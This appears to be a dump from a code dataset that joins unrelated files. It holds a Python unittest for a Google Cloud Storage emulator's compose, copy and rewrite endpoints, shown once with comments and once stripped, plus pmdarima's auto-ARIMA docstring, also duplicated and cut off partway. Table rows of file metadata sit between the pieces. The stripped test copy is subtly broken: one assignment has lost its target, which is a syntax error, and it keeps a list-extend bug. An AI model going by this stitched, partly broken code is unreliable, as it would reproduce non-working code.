        # is comparable with the default-projection GET below.
        compose_rest.pop("acl")
        compose_rest.pop("owner")
        response = self.client.get("/storage/v1/b/bucket-name/o/both")
        self.assertEqual(response.status_code, 200)
        self.assertTrue(
            response.headers.get("content-type").startswith("application/json")
        )
        get_rest = json.loads(response.data)
        self.assertEqual(get_rest, compose_rest)
        # The composed payload is the source payloads concatenated.
        response = self.client.get("/bucket-name/both")
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response.data.decode("utf-8"), payloads["fox"] + payloads["zebra"]
        )

    def test_object_compose_invalid_requests(self):
        """Malformed compose requests are rejected with 400."""
        response = self.client.post(
            "/storage/v1/b", data=json.dumps({"name": "bucket-name"})
        )
        self.assertEqual(response.status_code, 200)
        # Missing the required "sourceObjects" field.
        response = self.client.post(
            "/storage/v1/b/bucket-name/o/both/compose",
            data=json.dumps({"invalid-sourceObjects": []}),
        )
        self.assertEqual(response.status_code, 400)
        # Too many source objects. The previous code used
        # `sources.extend({...})`, which extends with the dict's *keys*
        # (plain strings); append one source dict per iteration instead.
        sources = []
        for _ in range(64):
            sources.append({"name": "test-only-invalid-object"})
        response = self.client.post(
            "/storage/v1/b/bucket-name/o/both/compose",
            data=json.dumps({"sourceObjects": sources}),
        )
        self.assertEqual(response.status_code, 400)
        # A source entry without a "name" field.
        response = self.client.post(
            "/storage/v1/b/bucket-name/o/both/compose",
            data=json.dumps({"sourceObjects": [{"invalid-name": "unused"}]}),
        )
        self.assertEqual(response.status_code, 400)

    def test_object_copy(self):
        """copyTo creates a new object whose metadata matches a plain GET."""
        response = self.client.post(
            "/storage/v1/b", data=json.dumps({"name": "bucket-name"})
        )
        self.assertEqual(response.status_code, 200)
        payload = "The quick brown fox jumps over the lazy dog"
        response = self.client.put(
            "/bucket-name/fox",
            content_type="text/plain",
            data=payload,
        )
        self.assertEqual(response.status_code, 200)
        response = self.client.post(
            "/storage/v1/b/bucket-name/o/fox/copyTo/b/bucket-name/o/fox2"
        )
        self.assertEqual(response.status_code, 200, msg=response.data)
        self.assertTrue(
            response.headers.get("content-type").startswith("application/json")
        )
        copy_rest = json.loads(response.data)
        # Drop full-projection-only fields for comparison with the GET below.
        copy_rest.pop("acl")
        copy_rest.pop("owner")
        response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
        self.assertEqual(response.status_code, 200)
        self.assertTrue(
            response.headers.get("content-type").startswith("application/json")
        )
        get_rest = json.loads(response.data)
        self.assertEqual(get_rest, copy_rest)
        # The source object is untouched.
        response = self.client.get("/bucket-name/fox")
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response.data.decode("utf-8"), "The quick brown fox jumps over the lazy dog"
        )

    def test_object_copy_with_metadata(self):
        """copyTo applies metadata supplied in the request body."""
        response = self.client.post(
            "/storage/v1/b", data=json.dumps({"name": "bucket-name"})
        )
        self.assertEqual(response.status_code, 200)
        payload = "The quick brown fox jumps over the lazy dog"
        response = self.client.put(
            "/bucket-name/fox",
            content_type="text/plain",
            data=payload,
        )
        self.assertEqual(response.status_code, 200)
        metadata = {"key0": "label0"}
        response = self.client.post(
            "/storage/v1/b/bucket-name/o/fox/copyTo/b/bucket-name/o/fox2",
            data=json.dumps({"metadata": metadata}),
        )
        self.assertEqual(response.status_code, 200)
        self.assertTrue(
            response.headers.get("content-type").startswith("application/json")
        )
        copy_rest = json.loads(response.data)
        copy_rest.pop("acl")
        copy_rest.pop("owner")
        response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
        self.assertEqual(response.status_code, 200)
        self.assertTrue(
            response.headers.get("content-type").startswith("application/json")
        )
        get_rest = json.loads(response.data)
        self.assertEqual(get_rest, copy_rest)
        # The supplied metadata is a subset of the copy's metadata.
        self.assertEqual(get_rest["metadata"], {**get_rest["metadata"], **metadata})
        # The copy carries the source payload.
        response = self.client.get("/bucket-name/fox2")
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response.data.decode("utf-8"), "The quick brown fox jumps over the lazy dog"
        )

    def test_object_rewrite(self):
        """rewriteTo progresses across calls until done, then returns the object."""
        response = self.client.post(
            "/storage/v1/b", data=json.dumps({"name": "bucket-name"})
        )
        self.assertEqual(response.status_code, 200)
        # We need a large enough payload to make sure the first rewrite does
        # not complete. The minimum is 1 MiB
        payload = "The quick brown fox jumps over the lazy dog\n" * 1024 * 1024
        response = self.client.put(
            "/bucket-name/fox",
            content_type="text/plain",
            data=payload,
        )
        self.assertEqual(response.status_code, 200)
        metadata = {"key0": "label0"}
        response = self.client.post(
            "/storage/v1/b/bucket-name/o/fox/rewriteTo/b/bucket-name/o/fox2",
            data=json.dumps({"metadata": metadata}),
        )
        self.assertEqual(response.status_code, 200)
        self.assertTrue(
            response.headers.get("content-type").startswith("application/json")
        )
        rewrite_rest = json.loads(response.data)
        expected_fields = {
            "kind",
            "totalBytesRewritten",
            "objectSize",
            "done",
            "rewriteToken",
        }
        actual_fields = set(rewrite_rest.keys())
        self.assertEqual(actual_fields, actual_fields | expected_fields)
        # The first call must not finish: keep calling with the token.
        self.assertEqual(rewrite_rest.get("done"), False)
        token = rewrite_rest.get("rewriteToken")
        while not rewrite_rest.get("done"):
            response = self.client.post(
                "/storage/v1/b/bucket-name/o/fox/rewriteTo/b/bucket-name/o/fox2",
                query_string={"maxBytesRewrittenPerCall": 10, "rewriteToken": token},
                data=json.dumps({"metadata": metadata}),
            )
            self.assertEqual(response.status_code, 200, msg=response.data)
            self.assertTrue(
                response.headers.get("content-type").startswith("application/json")
            )
            rewrite_rest = json.loads(response.data)
        # Once done, a rewrite returns the new object metadata
        self.assertIn("resource", rewrite_rest)
        resource = rewrite_rest.get("resource")
        # TODO(#27) - I do not understand why the rewrite always returns the full projection
        resource.pop("acl")
        resource.pop("owner")
        response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
        self.assertEqual(response.status_code, 200)
        self.assertTrue(
            response.headers.get("content-type").startswith("application/json")
        )
        get_rest = json.loads(response.data)
        self.assertEqual(get_rest, resource)
        self.assertEqual(get_rest["metadata"], {**get_rest["metadata"], **metadata})
        # The rewritten object has the same size as the source payload.
        response = self.client.get("/bucket-name/fox2")
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data.decode("utf-8")), len(payload))
if __name__ == "__main__":
    # Allow running this test module directly, outside a test runner.
    unittest.main()
| 37.713768 | 92 | 0.607647 |
import json
import os
import unittest
from testbench import rest_server
class TestTestbenchObjectSpecial(unittest.TestCase):
def setUp(self):
rest_server.db.clear()
self.client = rest_server.server.test_client()
os.environ.pop("GOOGLE_CLOUD_CPP_STORAGE_TEST_BUCKET_NAME", None)
def test_object_compose(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payloads = {
"fox": "The quick brown fox jumps over the lazy dog\n",
"zebra": "How vexingly quick daft zebras jump!\n",
}
sources = []
for object_name, payload in payloads.items():
response = self.client.put(
"/bucket-name/" + object_name,
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
response = self.client.get("/storage/v1/b/bucket-name/o/" + object_name)
self.assertEqual(response.status_code, 200)
o = json.loads(response.data)
sources.append(
{
"name": object_name,
"generation": o.get("generation"),
"objectPreconditions": {"ifGenerationMatch": o.get("generation")},
}
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"sourceObjects": sources}),
)
self.assertEqual(response.status_code, 200, msg=response.data)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
compose_rest = json.loads(response.data)
compose_rest.pop("acl")
compose_rest.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/both")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, compose_rest)
response = self.client.get("/bucket-name/both")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data.decode("utf-8"), payloads["fox"] + payloads["zebra"]
)
def test_object_compose_invalid_requests(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"invalid-sourceObjects": []}),
)
self.assertEqual(response.status_code, 400)
sources = []
for i in range(0, 64):
sources.extend({"name": "test-only-invalid-object"})
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"sourceObjects": sources}),
)
self.assertEqual(response.status_code, 400)
response = self.client.post(
"/storage/v1/b/bucket-name/o/both/compose",
data=json.dumps({"sourceObjects": [{"invalid-name": "unused"}]}),
)
self.assertEqual(response.status_code, 400)
def test_object_copy(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payload = "The quick brown fox jumps over the lazy dog"
response = self.client.put(
"/bucket-name/fox",
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/copyTo/b/bucket-name/o/fox2"
)
self.assertEqual(response.status_code, 200, msg=response.data)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
copy_rest = json.loads(response.data)
copy_rest.pop("acl")
copy_rest.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, copy_rest)
response = self.client.get("/bucket-name/fox")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data.decode("utf-8"), "The quick brown fox jumps over the lazy dog"
)
def test_object_copy_with_metadata(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payload = "The quick brown fox jumps over the lazy dog"
response = self.client.put(
"/bucket-name/fox",
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
metadata = {"key0": "label0"}
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/copyTo/b/bucket-name/o/fox2",
data=json.dumps({"metadata": metadata}),
)
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
copy_rest = json.loads(response.data)
copy_rest.pop("acl")
copy_rest.pop("owner")
response = self.client.get("/storage/v1/b/bucket-name/o/fox2")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, copy_rest)
self.assertEqual(get_rest["metadata"], {**get_rest["metadata"], **metadata})
response = self.client.get("/bucket-name/fox2")
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data.decode("utf-8"), "The quick brown fox jumps over the lazy dog"
)
def test_object_rewrite(self):
response = self.client.post(
"/storage/v1/b", data=json.dumps({"name": "bucket-name"})
)
self.assertEqual(response.status_code, 200)
payload = "The quick brown fox jumps over the lazy dog\n" * 1024 * 1024
response = self.client.put(
"/bucket-name/fox",
content_type="text/plain",
data=payload,
)
self.assertEqual(response.status_code, 200)
metadata = {"key0": "label0"}
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/rewriteTo/b/bucket-name/o/fox2",
data=json.dumps({"metadata": metadata}),
)
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
rewrite_rest = json.loads(response.data)
expected_fields = {
"kind",
"totalBytesRewritten",
"objectSize",
"done",
"rewriteToken",
}
actual_fields = set(rewrite_rest.keys())
self.assertEqual(actual_fields, actual_fields | expected_fields)
self.assertEqual(rewrite_rest.get("done"), False)
token = rewrite_rest.get("rewriteToken")
while not rewrite_rest.get("done"):
response = self.client.post(
"/storage/v1/b/bucket-name/o/fox/rewriteTo/b/bucket-name/o/fox2",
query_string={"maxBytesRewrittenPerCall": 10, "rewriteToken": token},
data=json.dumps({"metadata": metadata}),
)
self.assertEqual(response.status_code, 200, msg=response.data)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
rewrite_rest = json.loads(response.data)
self.assertIn("resource", rewrite_rest)
resource = rewrite_rest.get("resource")
= self.client.get("/storage/v1/b/bucket-name/o/fox2")
self.assertEqual(response.status_code, 200)
self.assertTrue(
response.headers.get("content-type").startswith("application/json")
)
get_rest = json.loads(response.data)
self.assertEqual(get_rest, resource)
self.assertEqual(get_rest["metadata"], {**get_rest["metadata"], **metadata})
response = self.client.get("/bucket-name/fox2")
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data.decode("utf-8")), len(payload))
if __name__ == "__main__":
unittest.main()
| true | true |
f7232b4e748440a700c512c24ddd5528c3763424 | 14,263 | py | Python | pmdarima/arima/_doc.py | chivalry/pmdarima | 83aaa8249fc93b8bc2311431af53d2d10d312eea | [
"MIT"
] | null | null | null | pmdarima/arima/_doc.py | chivalry/pmdarima | 83aaa8249fc93b8bc2311431af53d2d10d312eea | [
"MIT"
] | null | null | null | pmdarima/arima/_doc.py | chivalry/pmdarima | 83aaa8249fc93b8bc2311431af53d2d10d312eea | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# This is used (with minor differences) in both the class and the function
_AUTO_ARIMA_DOCSTR = \
"""Automatically discover the optimal order for an ARIMA model.
The auto-ARIMA process seeks to identify the most optimal
parameters for an ``ARIMA`` model, settling on a single fitted ARIMA model.
This process is based on the commonly-used R function,
``forecast::auto.arima`` [3].
Auto-ARIMA works by conducting differencing tests (i.e.,
Kwiatkowski–Phillips–Schmidt–Shin, Augmented Dickey-Fuller or
Phillips–Perron) to determine the order of differencing, ``d``, and then
fitting models within ranges of defined ``start_p``, ``max_p``,
``start_q``, ``max_q`` ranges. If the ``seasonal`` option is enabled,
auto-ARIMA also seeks to identify the optimal ``P`` and ``Q`` hyper-
parameters after conducting the Canova-Hansen to determine the optimal
order of seasonal differencing, ``D``.
In order to find the best model, auto-ARIMA optimizes for a given
``information_criterion``, one of ('aic', 'aicc', 'bic', 'hqic', 'oob')
(Akaike Information Criterion, Corrected Akaike Information Criterion,
Bayesian Information Criterion, Hannan-Quinn Information Criterion, or
"out of bag"--for validation scoring--respectively) and returns the ARIMA
which minimizes the value.
Note that due to stationarity issues, auto-ARIMA might not find a
suitable model that will converge. If this is the case, a ``ValueError``
will be thrown suggesting stationarity-inducing measures be taken prior
to re-fitting or that a new range of ``order`` values be selected. Non-
stepwise (i.e., essentially a grid search) selection can be slow,
especially for seasonal data. Stepwise algorithm is outlined in Hyndman and
Khandakar (2008).
Parameters
----------{y}{exogenous}
start_p : int, optional (default=2)
The starting value of ``p``, the order (or number of time lags)
of the auto-regressive ("AR") model. Must be a positive integer.
d : int, optional (default=None)
The order of first-differencing. If None (by default), the value
will automatically be selected based on the results of the ``test``
(i.e., either the Kwiatkowski–Phillips–Schmidt–Shin, Augmented
Dickey-Fuller or the Phillips–Perron test will be conducted to find
the most probable value). Must be a positive integer or None. Note
that if ``d`` is None, the runtime could be significantly longer.
start_q : int, optional (default=2)
The starting value of ``q``, the order of the moving-average
("MA") model. Must be a positive integer.
max_p : int, optional (default=5)
The maximum value of ``p``, inclusive. Must be a positive integer
greater than or equal to ``start_p``.
max_d : int, optional (default=2)
The maximum value of ``d``, or the maximum number of non-seasonal
differences. Must be a positive integer greater than or equal to ``d``.
max_q : int, optional (default=5)
The maximum value of ``q``, inclusive. Must be a positive integer
greater than ``start_q``.
start_P : int, optional (default=1)
The starting value of ``P``, the order of the auto-regressive portion
of the seasonal model.
D : int, optional (default=None)
The order of the seasonal differencing. If None (by default, the value
will automatically be selected based on the results of the
``seasonal_test``. Must be a positive integer or None.
start_Q : int, optional (default=1)
The starting value of ``Q``, the order of the moving-average portion
of the seasonal model.
max_P : int, optional (default=2)
The maximum value of ``P``, inclusive. Must be a positive integer
greater than ``start_P``.
max_D : int, optional (default=1)
The maximum value of ``D``. Must be a positive integer greater
than ``D``.
max_Q : int, optional (default=2)
The maximum value of ``Q``, inclusive. Must be a positive integer
greater than ``start_Q``.
max_order : int, optional (default=10)
If the sum of ``p`` and ``q`` is >= ``max_order``, a model will
*not* be fit with those parameters, but will progress to the next
combination. Default is 10. If ``max_order`` is None, it means there
are no constraints on maximum order.
m : int, optional (default=1)
The period for seasonal differencing, ``m`` refers to the number of
periods in each season. For example, ``m`` is 4 for quarterly data, 12
for monthly data, or 1 for annual (non-seasonal) data. Default is 1.
Note that if ``m`` == 1 (i.e., is non-seasonal), ``seasonal`` will be
set to False. For more information on setting this parameter, see
:ref:`period`.
seasonal : bool, optional (default=True)
Whether to fit a seasonal ARIMA. Default is True. Note that if
``seasonal`` is True and ``m`` == 1, ``seasonal`` will be set to False.
stationary : bool, optional (default=False)
Whether the time-series is stationary and ``d`` should be set to zero.
information_criterion : str, optional (default='aic')
The information criterion used to select the best ARIMA model. One of
``pmdarima.arima.auto_arima.VALID_CRITERIA``, ('aic', 'bic', 'hqic',
'oob').
alpha : float, optional (default=0.05)
Level of the test for testing significance.
test : str, optional (default='kpss')
Type of unit root test to use in order to detect stationarity if
``stationary`` is False and ``d`` is None. Default is 'kpss'
(Kwiatkowski–Phillips–Schmidt–Shin).
seasonal_test : str, optional (default='ocsb')
This determines which seasonal unit root test is used if ``seasonal``
is True and ``D`` is None. Default is 'OCSB'.
stepwise : bool, optional (default=True)
Whether to use the stepwise algorithm outlined in Hyndman and Khandakar
(2008) to identify the optimal model parameters. The stepwise algorithm
can be significantly faster than fitting all (or a ``random`` subset
of) hyper-parameter combinations and is less likely to over-fit
the model.
n_jobs : int, optional (default=1)
The number of models to fit in parallel in the case of a grid search
(``stepwise=False``). Default is 1, but -1 can be used to designate
"as many as possible".
start_params : array-like, optional (default=None)
Starting parameters for ``ARMA(p,q)``. If None, the default is given
by ``ARMA._fit_start_params``.
transparams : bool, optional (default=True)
Whether or not to transform the parameters to ensure stationarity.
Uses the transformation suggested in Jones (1980). If False,
no checking for stationarity or invertibility is done.
method : str, one of ('css-mle','mle','css'), optional (default=None)
This is the loglikelihood to maximize. If "css-mle", the
conditional sum of squares likelihood is maximized and its values
are used as starting values for the computation of the exact
likelihood via the Kalman filter. If "mle", the exact likelihood
is maximized via the Kalman Filter. If "css" the conditional sum
of squares likelihood is maximized. All three methods use
`start_params` as starting parameters. See above for more
information. If fitting a seasonal ARIMA, the default is 'lbfgs'
trend : str or None, optional (default=None)
The trend parameter. If ``with_intercept`` is True, ``trend`` will be
used. If ``with_intercept`` is False, the trend will be set to a no-
intercept value.
solver : str or None, optional (default='lbfgs')
Solver to be used. The default is 'lbfgs' (limited memory
Broyden-Fletcher-Goldfarb-Shanno). Other choices are 'bfgs',
'newton' (Newton-Raphson), 'nm' (Nelder-Mead), 'cg' -
(conjugate gradient), 'ncg' (non-conjugate gradient), and
'powell'. By default, the limited memory BFGS uses m=12 to
approximate the Hessian, projected gradient tolerance of 1e-8 and
factr = 1e2. You can change these by using kwargs.
maxiter : int, optional (default=None)
The maximum number of function evaluations. Statsmodels defaults this
value to 50 for SARIMAX models and 500 for ARIMA and ARMA models. If
passed as None, will use the seasonal order to determine which to use
(50 for seasonal, 500 otherwise).
disp : int, optional (default=0)
If True, convergence information is printed. For the default
'lbfgs' ``solver``, disp controls the frequency of the output during
the iterations. disp < 0 means no output in this case.
callback : callable, optional (default=None)
Called after each iteration as callback(xk) where xk is the current
parameter vector. This is only used in non-seasonal ARIMA models.
offset_test_args : dict, optional (default=None)
The args to pass to the constructor of the offset (``d``) test. See
``pmdarima.arima.stationarity`` for more details.
seasonal_test_args : dict, optional (default=None)
The args to pass to the constructor of the seasonal offset (``D``)
test. See ``pmdarima.arima.seasonality`` for more details.
suppress_warnings : bool, optional (default=False)
Many warnings might be thrown inside of statsmodels. If
``suppress_warnings`` is True, all of the warnings coming from
``ARIMA`` will be squelched.
error_action : str, optional (default='warn')
If unable to fit an ``ARIMA`` due to stationarity issues, whether to
warn ('warn'), raise the ``ValueError`` ('raise') or ignore ('ignore').
Note that the default behavior is to warn, and fits that fail will be
returned as None. This is the recommended behavior, as statsmodels
ARIMA and SARIMAX models hit bugs periodically that can cause
an otherwise healthy parameter combination to fail for reasons not
related to pmdarima.
trace : bool, optional (default=False)
Whether to print status on the fits. Note that this can be
very verbose...
random : bool, optional (default=False)
Similar to grid searches, ``auto_arima`` provides the capability to
perform a "random search" over a hyper-parameter space. If ``random``
is True, rather than perform an exhaustive search or ``stepwise``
search, only ``n_fits`` ARIMA models will be fit (``stepwise`` must be
False for this option to do anything).
random_state : int, long or numpy ``RandomState``, optional (default=None)
The PRNG for when ``random=True``. Ensures replicable testing and
results.
n_fits : int, optional (default=10)
If ``random`` is True and a "random search" is going to be performed,
``n_iter`` is the number of ARIMA models to be fit.
{return_valid_fits}
out_of_sample_size : int, optional (default=0)
The ``ARIMA`` class can fit only a portion of the data if specified,
in order to retain an "out of bag" sample score. This is the
number of examples from the tail of the time series to hold out
and use as validation examples. The model will not be fit on these
samples, but the observations will be added into the model's ``endog``
and ``exog`` arrays so that future forecast values originate from the
end of the endogenous vector.
For instance::
y = [0, 1, 2, 3, 4, 5, 6]
out_of_sample_size = 2
> Fit on: [0, 1, 2, 3, 4]
> Score on: [5, 6]
> Append [5, 6] to end of self.arima_res_.data.endog values
scoring : str, optional (default='mse')
If performing validation (i.e., if ``out_of_sample_size`` > 0), the
metric to use for scoring the out-of-sample data. One of ('mse', 'mae')
scoring_args : dict, optional (default=None)
A dictionary of key-word arguments to be passed to the ``scoring``
metric.
with_intercept : bool, optional (default=True)
Whether to include an intercept term. Default is True.
sarimax_kwargs : dict or None, optional (default=None)
Keyword arguments to pass to the SARIMAX constructor, if seasonal.
{fit_args}
See Also
--------
:func:`pmdarima.arima.ARIMA`
Notes
-----
* Fitting with `stepwise=False` can prove slower, especially when
`seasonal=True`.
References
----------
.. [1] https://wikipedia.org/wiki/Autoregressive_integrated_moving_average
.. [2] R's auto-arima source code: http://bit.ly/2gOh5z2
.. [3] R's auto-arima documentation: http://bit.ly/2wbBvUN
"""
_Y_DOCSTR = """
y : array-like or iterable, shape=(n_samples,)
The time-series to which to fit the ``ARIMA`` estimator. This may
either be a Pandas ``Series`` object (statsmodels can internally
use the dates in the index), or a numpy array. This should be a
one-dimensional array of floats, and should not contain any
``np.nan`` or ``np.inf`` values.
"""
_EXOG_DOCSTR = """
exogenous : array-like, shape=[n_obs, n_vars], optional (default=None)
An optional 2-d array of exogenous variables. If provided, these
variables are used as additional features in the regression
operation. This should not include a constant or trend. Note that
if an ``ARIMA`` is fit on exogenous features, it must be provided
exogenous features for making predictions.
"""
_FIT_ARGS_DOCSTR = """
**fit_args : dict, optional (default=None)
A dictionary of keyword arguments to pass to the :func:`ARIMA.fit`
method.
"""
_VALID_FITS_DOCSTR = """
return_valid_fits : bool, optional (default=False)
If True, will return all valid ARIMA fits in a list. If False (by
default), will only return the best fit.
"""
| 46.459283 | 79 | 0.665077 |
_AUTO_ARIMA_DOCSTR = \
"""Automatically discover the optimal order for an ARIMA model.
The auto-ARIMA process seeks to identify the most optimal
parameters for an ``ARIMA`` model, settling on a single fitted ARIMA model.
This process is based on the commonly-used R function,
``forecast::auto.arima`` [3].
Auto-ARIMA works by conducting differencing tests (i.e.,
Kwiatkowski–Phillips–Schmidt–Shin, Augmented Dickey-Fuller or
Phillips–Perron) to determine the order of differencing, ``d``, and then
fitting models within ranges of defined ``start_p``, ``max_p``,
``start_q``, ``max_q`` ranges. If the ``seasonal`` optional is enabled,
auto-ARIMA also seeks to identify the optimal ``P`` and ``Q`` hyper-
parameters after conducting the Canova-Hansen to determine the optimal
order of seasonal differencing, ``D``.
In order to find the best model, auto-ARIMA optimizes for a given
``information_criterion``, one of ('aic', 'aicc', 'bic', 'hqic', 'oob')
(Akaike Information Criterion, Corrected Akaike Information Criterion,
Bayesian Information Criterion, Hannan-Quinn Information Criterion, or
"out of bag"--for validation scoring--respectively) and returns the ARIMA
which minimizes the value.
Note that due to stationarity issues, auto-ARIMA might not find a
suitable model that will converge. If this is the case, a ``ValueError``
will be thrown suggesting stationarity-inducing measures be taken prior
to re-fitting or that a new range of ``order`` values be selected. Non-
stepwise (i.e., essentially a grid search) selection can be slow,
especially for seasonal data. Stepwise algorithm is outlined in Hyndman and
Khandakar (2008).
Parameters
----------{y}{exogenous}
start_p : int, optional (default=2)
The starting value of ``p``, the order (or number of time lags)
of the auto-regressive ("AR") model. Must be a positive integer.
d : int, optional (default=None)
The order of first-differencing. If None (by default), the value
will automatically be selected based on the results of the ``test``
(i.e., either the Kwiatkowski–Phillips–Schmidt–Shin, Augmented
Dickey-Fuller or the Phillips–Perron test will be conducted to find
the most probable value). Must be a positive integer or None. Note
that if ``d`` is None, the runtime could be significantly longer.
start_q : int, optional (default=2)
The starting value of ``q``, the order of the moving-average
("MA") model. Must be a positive integer.
max_p : int, optional (default=5)
The maximum value of ``p``, inclusive. Must be a positive integer
greater than or equal to ``start_p``.
max_d : int, optional (default=2)
The maximum value of ``d``, or the maximum number of non-seasonal
differences. Must be a positive integer greater than or equal to ``d``.
max_q : int, optional (default=5)
The maximum value of ``q``, inclusive. Must be a positive integer
greater than ``start_q``.
start_P : int, optional (default=1)
The starting value of ``P``, the order of the auto-regressive portion
of the seasonal model.
D : int, optional (default=None)
The order of the seasonal differencing. If None (by default, the value
will automatically be selected based on the results of the
``seasonal_test``. Must be a positive integer or None.
start_Q : int, optional (default=1)
The starting value of ``Q``, the order of the moving-average portion
of the seasonal model.
max_P : int, optional (default=2)
The maximum value of ``P``, inclusive. Must be a positive integer
greater than ``start_P``.
max_D : int, optional (default=1)
The maximum value of ``D``. Must be a positive integer greater
than ``D``.
max_Q : int, optional (default=2)
The maximum value of ``Q``, inclusive. Must be a positive integer
greater than ``start_Q``.
max_order : int, optional (default=10)
If the sum of ``p`` and ``q`` is >= ``max_order``, a model will
*not* be fit with those parameters, but will progress to the next
        combination. Default is 10. If ``max_order`` is None, it means there
are no constraints on maximum order.
m : int, optional (default=1)
The period for seasonal differencing, ``m`` refers to the number of
periods in each season. For example, ``m`` is 4 for quarterly data, 12
for monthly data, or 1 for annual (non-seasonal) data. Default is 1.
Note that if ``m`` == 1 (i.e., is non-seasonal), ``seasonal`` will be
set to False. For more information on setting this parameter, see
:ref:`period`.
seasonal : bool, optional (default=True)
Whether to fit a seasonal ARIMA. Default is True. Note that if
``seasonal`` is True and ``m`` == 1, ``seasonal`` will be set to False.
stationary : bool, optional (default=False)
Whether the time-series is stationary and ``d`` should be set to zero.
information_criterion : str, optional (default='aic')
The information criterion used to select the best ARIMA model. One of
``pmdarima.arima.auto_arima.VALID_CRITERIA``, ('aic', 'bic', 'hqic',
'oob').
alpha : float, optional (default=0.05)
Level of the test for testing significance.
test : str, optional (default='kpss')
Type of unit root test to use in order to detect stationarity if
``stationary`` is False and ``d`` is None. Default is 'kpss'
(Kwiatkowski–Phillips–Schmidt–Shin).
seasonal_test : str, optional (default='ocsb')
This determines which seasonal unit root test is used if ``seasonal``
is True and ``D`` is None. Default is 'OCSB'.
stepwise : bool, optional (default=True)
Whether to use the stepwise algorithm outlined in Hyndman and Khandakar
(2008) to identify the optimal model parameters. The stepwise algorithm
can be significantly faster than fitting all (or a ``random`` subset
of) hyper-parameter combinations and is less likely to over-fit
the model.
n_jobs : int, optional (default=1)
The number of models to fit in parallel in the case of a grid search
(``stepwise=False``). Default is 1, but -1 can be used to designate
"as many as possible".
start_params : array-like, optional (default=None)
Starting parameters for ``ARMA(p,q)``. If None, the default is given
by ``ARMA._fit_start_params``.
transparams : bool, optional (default=True)
Whether or not to transform the parameters to ensure stationarity.
Uses the transformation suggested in Jones (1980). If False,
no checking for stationarity or invertibility is done.
method : str, one of ('css-mle','mle','css'), optional (default=None)
This is the loglikelihood to maximize. If "css-mle", the
conditional sum of squares likelihood is maximized and its values
are used as starting values for the computation of the exact
likelihood via the Kalman filter. If "mle", the exact likelihood
is maximized via the Kalman Filter. If "css" the conditional sum
of squares likelihood is maximized. All three methods use
`start_params` as starting parameters. See above for more
information. If fitting a seasonal ARIMA, the default is 'lbfgs'
trend : str or None, optional (default=None)
The trend parameter. If ``with_intercept`` is True, ``trend`` will be
used. If ``with_intercept`` is False, the trend will be set to a no-
intercept value.
solver : str or None, optional (default='lbfgs')
Solver to be used. The default is 'lbfgs' (limited memory
Broyden-Fletcher-Goldfarb-Shanno). Other choices are 'bfgs',
'newton' (Newton-Raphson), 'nm' (Nelder-Mead), 'cg' -
(conjugate gradient), 'ncg' (non-conjugate gradient), and
'powell'. By default, the limited memory BFGS uses m=12 to
approximate the Hessian, projected gradient tolerance of 1e-8 and
factr = 1e2. You can change these by using kwargs.
maxiter : int, optional (default=None)
The maximum number of function evaluations. Statsmodels defaults this
value to 50 for SARIMAX models and 500 for ARIMA and ARMA models. If
passed as None, will use the seasonal order to determine which to use
(50 for seasonal, 500 otherwise).
disp : int, optional (default=0)
If True, convergence information is printed. For the default
'lbfgs' ``solver``, disp controls the frequency of the output during
the iterations. disp < 0 means no output in this case.
callback : callable, optional (default=None)
Called after each iteration as callback(xk) where xk is the current
parameter vector. This is only used in non-seasonal ARIMA models.
offset_test_args : dict, optional (default=None)
The args to pass to the constructor of the offset (``d``) test. See
``pmdarima.arima.stationarity`` for more details.
seasonal_test_args : dict, optional (default=None)
The args to pass to the constructor of the seasonal offset (``D``)
test. See ``pmdarima.arima.seasonality`` for more details.
suppress_warnings : bool, optional (default=False)
Many warnings might be thrown inside of statsmodels. If
``suppress_warnings`` is True, all of the warnings coming from
``ARIMA`` will be squelched.
error_action : str, optional (default='warn')
If unable to fit an ``ARIMA`` due to stationarity issues, whether to
warn ('warn'), raise the ``ValueError`` ('raise') or ignore ('ignore').
